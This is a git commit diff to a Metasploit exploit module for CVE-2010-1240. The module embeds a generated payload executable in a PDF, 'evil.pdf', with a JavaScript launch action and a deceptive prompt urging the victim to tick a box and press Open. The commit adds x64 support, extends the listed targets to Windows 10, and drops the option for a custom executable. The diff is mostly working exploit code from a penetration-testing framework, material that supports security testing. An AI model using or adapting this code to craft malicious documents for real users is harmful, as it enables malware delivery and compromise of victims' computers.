Add ARCH_X64 and test it, refactor to drop EXENAME

zeroSteiner · zeroSteiner · commit b61e6b1cc2b5 · 2024-08-26T16:25:03.000-04:00
diff --git a/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb b/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb
@@ -21,7 +21,7 @@ def initialize(info = {})
       'Author'	=>
         [
           'Colin Ames <amesc[at]attackresearch.com>', # initial module
-          'jduck' # add Documents for vista/win7
+          'jduck' # add Documents for vista/win7/win10
         ],
       'References'     =>
         [
@@ -35,21 +35,20 @@ def initialize(info = {})
       'DisclosureDate' => '2010-03-29',
       'Payload'	=>
         {
-          'Space'			    => 2048,
-          'DisableNops'		=> true,
-          'StackAdjustment'	=> -3500,
+          'Space' => 4096,
+          'DisableNops' => true
         },
+      'Arch' => [ ARCH_X86, ARCH_X64 ],
       'Platform'	=> 'win',
       'Targets'	=>
         [
-          [ 'Adobe Reader v8.x, v9.x / Windows XP SP3 (English/Spanish) / Windows Vista/7 (English)', { 'Ret' => '' } ]
+          [ 'Adobe Reader v8.x, v9.x / Windows XP SP3 (English/Spanish) / Windows Vista/7/10 (English)', { 'Ret' => '' } ]
         ],
       'DefaultTarget'	=> 0))
 
     register_options(
       [
         OptPath.new('INFILENAME', [ true, 'The Input PDF filename.', ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2010-1240', 'template.pdf') ]),
-        OptString.new('EXENAME', [ false, 'The Name of payload exe.']),
         OptString.new('FILENAME', [ false, 'The output filename.', 'evil.pdf']),
         OptString.new('LAUNCH_MESSAGE', [ false, 'The message to display in the File: area',
           "To view the encrypted content please tick the \"Do not show this message again\" box and press Open."]),
@@ -59,7 +58,6 @@ def initialize(info = {})
   def exploit
 
     file_name = datastore['INFILENAME']
-    exe_name = datastore['EXENAME']
 
     print_status("Reading in '#{file_name}'...")
     stream = read_pdf()
@@ -78,7 +76,6 @@ def exploit
         :stream => stream,
         :trailers => trailers,
         :file_name => file_name,
-        :exe_name => exe_name,
         :startxref => startxrefs.last
       })
 
@@ -103,24 +100,14 @@ def exploit
   end
 
 
-  def ef_payload(pdf_name,payload_exe,obj_num)
+  def ef_payload(pdf_name,obj_num)
 
-    if !(payload_exe and payload_exe.length > 0)
-      print_status("Using '#{datastore['PAYLOAD']}' as payload...")
+    print_status("Using '#{datastore['PAYLOAD']}' as payload...")
 
-      payload_exe = generate_payload_exe
-      file_size = payload_exe.length
-      stream = Rex::Text.zlib_deflate(payload_exe)
-      md5 = Rex::Text.md5(stream)
-
-    else
-      print_status("Using '#{datastore['EXENAME']}' as payload...")
-
-      file_size = File.size(payload_exe)
-      stream = Rex::Text.zlib_deflate(File.binread(payload_exe))
-      md5 = Rex::Text.md5(File.binread(payload_exe))
-
-    end
+    payload_exe = generate_payload_exe
+    file_size = payload_exe.length
+    stream = Rex::Text.zlib_deflate(payload_exe)
+    md5 = Rex::Text.md5(stream)
 
     output = String.new()
 
@@ -180,7 +167,6 @@ def basic_social_engineering_exploit(opts = {})
     stream = opts[:stream]
     trailers = opts[:trailers]
     file_name = opts[:file_name]
-    exe_name = opts[:exe_name]
     startxref = opts[:startxref]
 
     file_name = file_name.split(/\//).pop.to_s
@@ -288,7 +274,7 @@ def basic_social_engineering_exploit(opts = {})
     if new_embedded_files
       pdf_payload = String.new()
       num = trailers[0].fetch("Size").to_i - 1
-      pdf_payload << ef_payload(pdf_name,exe_name,num)
+      pdf_payload << ef_payload(pdf_name,num)
       pdf_payload << js_payload(pdf_name,num)
       new_pdf << stream << pdf_payload
 
@@ -323,7 +309,7 @@ def basic_social_engineering_exploit(opts = {})
       pdf_payload = String.new()
       num = trailers[0].fetch("Size").to_i
       pdf_payload << "#{num} 0 obj\r<</Names[(\xfe\xff#{Rex::Text.to_unicode(pdf_name,"utf-16be")})#{num + 1} 0 R]>>\rendobj\r"
-      pdf_payload << ef_payload(pdf_name,exe_name,num)
+      pdf_payload << ef_payload(pdf_name,num)
       pdf_payload << js_payload(pdf_name,num)
       new_pdf << stream << pdf_payload
 
@@ -360,7 +346,7 @@ def basic_social_engineering_exploit(opts = {})
       num = trailers[0].fetch("Size").to_i + 1
       pdf_payload << "#{trailers[0].fetch("Size")} 0 obj\r<</EmbeddedFiles #{num} 0 R>>\rendobj\r"
       pdf_payload << "#{num} 0 obj\r<</Names[(#{pdf_name})#{num + 1} 0 R]>>\rendobj\r"
-      pdf_payload << ef_payload(pdf_name,exe_name,num)
+      pdf_payload << ef_payload(pdf_name,num)
       pdf_payload << js_payload(pdf_name,num)
       new_pdf << stream << pdf_payload
       xrefs = xref_create(new_pdf,stream.length,"*")
